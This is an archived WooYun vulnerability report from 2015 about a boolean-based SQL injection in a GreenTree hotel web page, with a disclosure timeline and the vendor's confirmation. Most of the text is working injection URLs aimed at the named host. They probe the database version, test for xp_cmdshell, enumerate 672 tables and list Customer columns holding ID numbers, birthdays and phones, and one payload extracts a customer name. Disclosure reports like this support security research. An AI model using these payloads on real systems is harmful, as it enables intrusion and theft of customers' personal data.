乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-24: 细节已通知厂商并且等待厂商处理中 2015-08-26: 厂商已经确认,细节仅向厂商公开 2015-09-05: 细节向核心白帽子及相关领域专家公开 2015-09-15: 细节向普通白帽子公开 2015-09-25: 细节向实习白帽子公开 2015-10-10: 细节向公众公开
SQL注入boolean
http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?hotelcode=531001
输入'and'1'='1
输入'and'1'='2
查看数据库版本
http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?hotelcode=531001' and 1=(select @@VERSION) and '1'='1
当前数据库名
本地服务名
24个数据库
http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?hotelcode=531001' and 24= (select count(name) from master.dbo.sysdatabases) and '1'='1
XP_CMDSHELL存在
http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?hotelcode=531001' and 1= (Select count(name) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') and '1'='1
XP_regread扩展存储过程存在
爆表
http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?hotelcode=531001' and 1= (select top 1 name from sysobjects where xtype='u' ) and '1'='1
select top 1 name from sysobjects where xtype='u' and name not in('TurnsTable','crscount')select top 1 name from sysobjects where xtype='u' and name not in('TurnsTable','crscount','blacklist')select top 1 name from sysobjects where xtype='u' and name not in('TurnsTable','crscount','blacklist','Iccard_Request','m_initrebate','Customer')
一共672张表这里就不再一一列出了
http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?hotelcode=531001' and 672= ( select count(name) from sysobjects where xtype='u') and '1'='1
看表字段这里以Customer为例39个字段
如下:
CustomerCodeFirstNameLastNameMiddleNameNickNameGenderBirthdayNationalityIDRaceTitleLanguage1Language2CustomerTypeIDTravelAgentIDCustomerOriginRegion1Region2Note1Note2CompanyAddressTelephoneZipVisaIDExpirationDateIDTypeIDIDNumberVIPLevelVIPNumberCreateDateUploadFlagPriorityMobileCompanyTelCompanyFaxMemberTypeMemberNoUploadDateHotelCode
看一个字段
http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?hotelcode=531001' and 1= (select top 1 FirstName from Customer) and '1'='1
危害等级:中
漏洞Rank:10
确认时间:2015-08-26 08:58
感谢对格林的关注,已处理。。。
暂无